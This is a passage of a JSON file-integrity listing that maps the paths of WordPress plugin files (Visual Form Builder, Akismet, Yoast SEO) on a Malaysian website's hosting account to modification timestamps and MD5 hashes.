essages-tr_TR.js\":{\"d\":1544494885,\"h\":\"a045e723b2eaa26e3fd0600c6c88c461\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-en_US.js\":{\"d\":1544494885,\"h\":\"8a62ceb5105d09a585bf60c838744764\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-id_ID.js\":{\"d\":1544494885,\"h\":\"031808221cc10c246d703d84d01365d8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-en_GB.js\":{\"d\":1544494885,\"h\":\"8a272839742fe49f526b37ddf1e5e873\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-pt_PT.js\":{\"d\":1544494885,\"h\":\"072e6421f85421a5928e00e70809f138\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-cs_CS.js\":{\"d\":1544494885,\"h\":\"d65249fecb9f50cb7ec6a4e519f5b27e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-fr_FR.js\":{\"d\":1544494885,\"h\":\"f93d37c5d4624af60057ae5ac57205f4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-zh_TW.js\":{\"d\":1544494885,\"h\":\"c627f86ed4b2a5944c4c926f604eed29\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-hu_HU.js\":{\"d\":1544494885,\"h\":\"ca45baa6583794e1068c284cbb6a4f91\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/index.php\":{\"d\":1544494885,\"h\":\"8e8ad6ca6156bc03fb71954dc0c1179e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-pl_PL.js\":{\"d\":1544494885,\"h\":\"b279c322305cd5af155503c9c00a324a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-nl_NL.js\":{\"d\":1544494885,\"h\":\"b15edea45f5d1718ddd336a2ea5c3b78\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-en_AU.js\":{\"d\":1544494885,\"h\":\"f2940a78e676361f2a67b543c18fddda\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-ko_KR.js\":{\"d\":1544494885,\"h\":\"482b9ed16d2240c0d9df5c81f3b8eef7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-it_IT.js\":{\"d\":1544494885,\"h\":\"d505f3284979a12ad3c8a706ab92866d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-el_GR.js\":{\"d\":1544494885,\"h\":\"4d110df36a3dc1339cd7bdd4fa8530fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-zh_CN.js\":{\"d\":1544494885,\"h\":\"c9f6a2b3eaf368aead755793cb74b994\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/validate\\/messages-ru_RU.js\":{\"d\":1544494885,\"h\":\"903f67b7cbff849791f93082081c9d33\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-ko_KR.js\":{\"d\":1544494885,\"h\":\"42d87842e2a8deb4e602ce4654ea9e03\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-it_IT.js\":{\"d\":1544494885,\"h\":\"d1dc33b0e5beb16363ccedd793378797\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-id_ID.js\":{\"d\":1544494885,\"h\":\"848caac3cf11ff33772c81dedb3bbad8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-ja_JP.js\":{\"d\":1544494885,\"h\":\"2c0c3f2a7fde3ee99ea041c5a51c1bbc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-he_IL.js\":{\"d\":1544494885,\"h\":\"d1d88772c2450f012f1d3b0e81a6ab94\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-nl_NL.js\":{\"d\":1544494885,\"h\":\"74ab9d57b59d18dd08e6e11a63c07ec8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-es_ES.js\":{\"d\":1544494885,\"h\":\"b760d15e7dd117f5e4dfbdf5dd8297e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-sv_SE.js\":{\"d\":1544494885,\"h\":\"1bf8d27ef26c912ad6230134e4ae3178\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-en_GB.js\":{\"d\":1544494885,\"h\":\"0aa534a56bb9682900f588f118aea2d3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-ru_RU.js\":{\"d\":1544494885,\"h\":\"c8595c90d8192228415184b0b4f1493c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-pl_PL.js\":{\"d\":1544494885,\"h\":\"b33fd04364918f5256a30cc976577589\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-el_GR.js\":{\"d\":1544494885,\"h\":\"4beb94f3b790feaab24b88b4d6f5e6aa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-pt_BR.js\":{\"d\":1544494885,\"h\":\"36354dfd7bdf2e3f0dc55e874da5bb01\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-ro_RO.js\":{\"d\":1544494885,\"h\":\"74414164ccbf00e789a2e1872bc55889\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-de_DE.js\":{\"d\":1544494885,\"h\":\"85fcf7ff20f18126aa91aeb60c2013a8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/index.php\":{\"d\":1544494885,\"h\":\"8e8ad6ca6156bc03fb71954dc0c1179e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-fr_FR.js\":{\"d\":1544494885,\"h\":\"95cde50a8a1ccf6e9b97400955841ec2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-zh_TW.js\":{\"d\":1544494885,\"h\":\"1561ce0e396dfe50a7ed05f4a1437c70\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-en_US.js\":{\"d\":1544494885,\"h\":\"3dc8d4d03bee6f63c38b45fa681e62af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-pt_PT.js\":{\"d\":1544494885,\"h\":\"7daf3a146e75e5450dae4982e03aeada\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-en_AU.js\":{\"d\":1544494885,\"h\":\"45de91b08a8981bc5906b593d095cc96\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-cs_CS.js\":{\"d\":1544494885,\"h\":\"03739882bd61bcd68ec9086072639b5b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-tr_TR.js\":{\"d\":1544494885,\"h\":\"082cf09640dafd116d32b948a2b8a09f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-zh_CN.js\":{\"d\":1544494885,\"h\":\"c69a54c3bdce45de0940454c17af2441\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/datepicker\\/datepicker-hu_HU.js\":{\"d\":1544494885,\"h\":\"e0487f016bceaafe84c0dc747124ff84\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/i18n\\/index.php\":{\"d\":1544494885,\"h\":\"8e8ad6ca6156bc03fb71954dc0c1179e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/vfb-validation.js\":{\"d\":1544494885,\"h\":\"34c5bf6f83f91cb410bec76f0c0ea0f1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/jquery.validate.min.js\":{\"d\":1544494885,\"h\":\"c593e70ef041ab387fefad5fe38a724c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/index.php\":{\"d\":1544494885,\"h\":\"8e8ad6ca6156bc03fb71954dc0c1179e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/vfb-validation.min.js\":{\"d\":1544494885,\"h\":\"a22408d9848e41ad7feaf7bfcd060233\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/js\\/jquery.metadata.js\":{\"d\":1544494885,\"h\":\"059353487d65b302c4c1def7bbc59d1a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/assets\\/index.php\":{\"d\":1544494885,\"h\":\"8e8ad6ca6156bc03fb71954dc0c1179e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/class-load-css-js.php\":{\"d\":1544494885,\"h\":\"d03c971c946cb4f53cffd6383c57a253\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/class-confirmation.php\":{\"d\":1544494885,\"h\":\"606ef350ad35ac690c55642d58081623\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/index.php\":{\"d\":1544494885,\"h\":\"8e8ad6ca6156bc03fb71954dc0c1179e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/class-email.php\":{\"d\":1544608068,\"h\":\"16318b1cfb4447d79c822662ad562ada\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/class-security.php\":{\"d\":1544494885,\"h\":\"42fdce239ec2a128beac2c795060d636\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/public\\/class-form-display.php\":{\"d\":1544494885,\"h\":\"a47be0237ce803c511b6318f0f738e06\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/inc\\/class-list-table.php\":{\"d\":1544494885,\"h\":\"c4dfb5811e070229da7a2d7c50a5894f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/inc\\/countries.php\":{\"d\":1544494885,\"h\":\"d31c1454fa801691a813112900e5eaf3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/inc\\/class-install.php\":{\"d\":1544494885,\"h\":\"b33381caa8717c34ef4b08fc8f946d1e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/inc\\/class-uninstall.php\":{\"d\":1544494885,\"h\":\"d6404dc631673e8e3ec11bf158106c65\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/inc\\/index.php\":{\"d\":1544494885,\"h\":\"8e8ad6ca6156bc03fb71954dc0c1179e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/inc\\/class-i18n.php\":{\"d\":1544494885,\"h\":\"1cc943b39bbd95d554e33449c5ab0e2c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/visual-form-builder.php\":{\"d\":1544494885,\"h\":\"e50f4bf28d4c4cd2cc7b53b9f0cfb184\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/visual-form-builder\\/readme.txt\":{\"d\":1544494885,\"h\":\"f08432046cc45ee4bddcc55be919196e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/akismet\\/views\\/notice.php\":{\"d\":1528812842,\"h\":\"ae60802819e3d205db072fa594c9a378\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/akismet\\/views\\/stats.php\":{\"d\":1481828336,\"h\":\"a1adcd419f461e8902969a68e215d060\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/akismet\\/views\\/config.php\":{\"d\":1528812842,\"h\":\"cfdedf3bb97421685f889f2aaaa68628\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/akismet\\/views\\/start.php\":{\"d\":1499311020,\"h\":\"ce7235b09e4a99a50d87db4cff9fe458\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/akismet\\/views\\/get.php\":{\"d\":1485816028,\"h\":\"4efd5e1b3f2cda93bc66b7102f8791ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/akismet\\/_inc\\/akismet.css\":{\"d\":1524831004,\"h\":\"5dd2c24a00b6d6ce102e824c22ac7047\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/akismet\\/_inc\\/akismet.js\":{\"d\":1524831004,\"h\":\"bf016311e2d3b794c556d1cc7973d017\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/akismet\\/_inc\\/form.js\":{\"d\":1404326670,\"h\":\"270f0cd7341bce6c2afacf2682e7690e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/akismet\\/class.akismet-rest-api.php\":{\"d\":1540907868,\"h\":\"e2ba85ba3a4be01e8ec837265a394863\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/akismet\\/wrapper.php\":{\"d\":1474633790,\"h\":\"15fcd56c524b76c2e2470a2eed3426f4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/akismet\\/class.akismet-admin.php\":{\"d\":1537435438,\"h\":\"6ce7535585035a90d5dcf13f056019af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/akismet\\/class.akismet-widget.php\":{\"d\":1499909256,\"h\":\"31164f8db33265318eaefba6724ae06a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/akismet\\/akismet.php\":{\"d\":1542042486,\"h\":\"d0a63b00185337bdd9a32d47257fd9fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/akismet\\/class.akismet.php\":{\"d\":1540568438,\"h\":\"5334d68e202cc4afc3aceaad6ec0ddce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/akismet\\/.htaccess\":{\"d\":1462805402,\"h\":\"bf39be827c95ade49c322dfe231ff19c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/akismet\\/index.php\":{\"d\":1394479838,\"h\":\"cf6895af2050eb5ae7c0badda2604566\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/akismet\\/readme.txt\":{\"d\":1542042486,\"h\":\"73ab5be14d347812e8825b1af082c226\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/akismet\\/class.akismet-cli.php\":{\"d\":1530160508,\"h\":\"065a8481ab20ebe3e8714539673a0449\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/akismet\\/LICENSE.txt\":{\"d\":1440378166,\"h\":\"b234ee4d69f5fce4486a80fdaf4a4263\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/tracking\\/class-tracking-server-data.php\":{\"d\":1545638228,\"h\":\"75c8dbd7a101ddb2becb300ca930c11f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/tracking\\/class-tracking-plugin-data.php\":{\"d\":1545638228,\"h\":\"978e5067ed72cb87091e2bf21f3c31f2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/tracking\\/class-tracking.php\":{\"d\":1545638228,\"h\":\"1af79e4f9fc6dc5d84e0705985a6a06d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/tracking\\/class-tracking-default-data.php\":{\"d\":1545638228,\"h\":\"79133510a2c7871b9b23690b6e9c882f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/tracking\\/class-tracking-theme-data.php\":{\"d\":1545638228,\"h\":\"5ffdba17105657d9de86bdc56baefe19\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/menu\\/class-replacevar-field.php\":{\"d\":1545638228,\"h\":\"048d992720152dd54699d2eeee2671bf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/menu\\/class-admin-menu.php\":{\"d\":1545638228,\"h\":\"950f8d5a44faef0003a6bfc8b6fd620f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/menu\\/class-network-admin-menu.php\":{\"d\":1545638228,\"h\":\"da583ec12c99b08a862712c849a98ec1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/menu\\/class-base-menu.php\":{\"d\":1545638228,\"h\":\"e2ec87e97a4de1963e328064fdfba2ac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/menu\\/class-menu.php\":{\"d\":1545638228,\"h\":\"c36dcd7aae83b93fbab5b671fce16b2c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/menu\\/class-replacevar-editor.php\":{\"d\":1545638228,\"h\":\"af29d59d5a831e07021393e0a3a667f9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/menu\\/class-submenu-capability-normalize.php\":{\"d\":1545638228,\"h\":\"a4cba3bfe5076a28f38356da42c971aa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/services\\/class-indexable-term-provider.php\":{\"d\":1545638228,\"h\":\"ae1ad49bfccbcc0eeb38104356e6580e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/services\\/class-indexable-post-provider.php\":{\"d\":1545638228,\"h\":\"13ea3cef794dadd507b1ff3b9ea18d50\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/services\\/interface-indexable-provider.php\":{\"d\":1545638228,\"h\":\"72f5a7329d3dddb06623e2aac884de66\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/services\\/class-file-size.php\":{\"d\":1545638228,\"h\":\"9dcdc895be2092d147f7956f67a99902\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/services\\/class-indexable-provider.php\":{\"d\":1545638228,\"h\":\"a000c1105843041c882c24d25ec95377\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/services\\/class-indexable.php\":{\"d\":1545638228,\"h\":\"bf5a0fae729f869fa0261356c9ea7aa9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/roles\\/class-role-manager.php\":{\"d\":1545638228,\"h\":\"ee770446e448b56b684a175fa0c96ea1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/roles\\/class-abstract-role-manager.php\":{\"d\":1545638228,\"h\":\"b7dbba902629d3eebcad1a9505b066ff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/roles\\/class-role-manager-factory.php\":{\"d\":1545638228,\"h\":\"5b8276d5c790d40e29d1bfacbb5578e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/roles\\/class-register-roles.php\":{\"d\":1545638228,\"h\":\"5286a8f278f935178a6fdf62bdc62351\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/roles\\/class-role-manager-wp.php\":{\"d\":1545638228,\"h\":\"c2e998c539a915709bad98a6e5c0cbba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/roles\\/class-role-manager-vip.php\":{\"d\":1545638228,\"h\":\"f7ebe150f4a08c4e03efefa0607b524c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/filters\\/class-cornerstone-filter.php\":{\"d\":1545638228,\"h\":\"bae4efaf1f38ce4b2cffb70e1180b7ff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/filters\\/class-abstract-post-filter.php\":{\"d\":1545638228,\"h\":\"73d1f4401d11422d3b512d9d4f13108d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/pages\\/metas.php\":{\"d\":1545638228,\"h\":\"70e66e5de56466e3ac7cbee451e05aa1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/pages\\/social.php\":{\"d\":1545638228,\"h\":\"8e54f99616b8ea943dc3c5e3c524bc4b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/pages\\/dashboard.php\":{\"d\":1545638228,\"h\":\"c8ec23a024726dae0fe25770c76b6df5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/pages\\/network.php\":{\"d\":1545638228,\"h\":\"39e290380af46694db5d183f79973baa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/pages\\/tools.php\":{\"d\":1545638228,\"h\":\"d0b0ce60c0b22a5cceebb8705d8afb7d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/pages\\/licenses.php\":{\"d\":1545638228,\"h\":\"ec64c5d1a4dbd37358f293ec504ea2e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/links\\/class-link-query.php\":{\"d\":1545638228,\"h\":\"f4de9c28b5da91634247e978b6d5c412\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/links\\/class-link-content-processor.php\":{\"d\":1545638228,\"h\":\"e9d24290253f1485efb89f7bc70970e1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/links\\/class-link-reindex-post-endpoint.php\":{\"d\":1545638228,\"h\":\"df9077062073d2aea58becd6d47dbc70\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/links\\/class-link-storage.php\":{\"d\":1545638228,\"h\":\"b499ffcbf903824b4f38622121fddaa3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/links\\/class-link-extractor.php\":{\"d\":1545638228,\"h\":\"7f07b54d96f6ec86ebc4f12c2a828f29\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/links\\/class-link-columns.php\":{\"d\":1545638228,\"h\":\"31881be32640e1e1f87e13970653698c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/links\\/class-link-reindex-post-service.php\":{\"d\":1545638228,\"h\":\"640cd2fadf8de0642a6254d1d30ff652\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/links\\/class-link-watcher-loader.php\":{\"d\":1545638228,\"h\":\"58005a44183f40dfca143f8604a85341\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/links\\/class-link-watcher.php\":{\"d\":1545638228,\"h\":\"fefda878edd4201bc309ae181c3833ff\"},\"\\